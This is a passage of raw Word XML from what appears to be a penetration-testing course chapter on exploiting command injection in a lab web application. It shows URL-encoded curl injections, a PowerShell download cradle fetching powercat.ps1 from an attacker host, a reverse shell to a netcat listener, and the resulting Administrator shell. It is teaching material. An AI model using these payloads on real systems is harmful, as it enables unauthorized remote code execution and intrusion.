          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">See 'git help git' for an overview of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 44 - Determining where the injected commands are executed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output contains "PowerShell", meaning that our injected commands are executed in a PowerShell environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E3F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's try to leverage command injection to achieve system access. We will use</w:t>
      </w:r>
      <w:hyperlink r:id="rId312">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId313">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Powercat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a reverse shell. Powercat is a PowerShell implementation of Netcat included in Kali. Let's start a new terminal, copy Powercat to the home directory for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> user, and start a Python3 web server in the same directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E45">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 45 - Serve Powercat via Python3 web server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E46">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll start a third terminal tab to create a Netcat listener on port 4444 to catch the reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 4444 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 46 - Starting Netcat listener on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With our web server serving </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Netcat listener in place, we can now use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the first terminal to inject the following command. It consists of two parts delimited by a semicolon. The first part uses a PowerShell download cradle to load the Powercat function contained in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> script from our web server. The second command uses the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> function to create the reverse shell with the following parameters: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify where to connect, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the port, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for executing a program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E4F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 47 - Command to download PowerCat and execute a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E50">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Again, we'll use URL encoding for the command and send it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E51">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E52">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E53">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 48 - Downloading Powercat and creating a reverse shell via Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E54">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After entering the command, the second terminal should show that we received a GET request for the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powercat.ps1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E57">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.189 - - [05/Apr/2022 09:05:48] "GET /powercat.ps1 HTTP/1.1" 200 -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E58">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E59">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 49 - Python3 web server shows GET request for powercat.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll also find an incoming reverse shell connection in the third terminal for our active Netcat listener.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -nvlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 4444 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect to [192.168.119.3] from (UNKNOWN) [192.168.50.189] 50325</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows PowerShell </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copyright (C) Microsoft Corporation. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E61">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PS C:\Users\Administrator\Documents\meteor&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E63">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E64">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 50 - Successfull reverse shell connection via Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E65">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 50 shows that we received a reverse shell. Instead of using Powercat, we could also inject a PowerShell reverse shell directly. There are many ways to exploit a command injection vulnerability that depend heavily on the underlying operating system and the implementation of the web application, as well as any security mechanisms in place.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E67">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E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9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E6A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
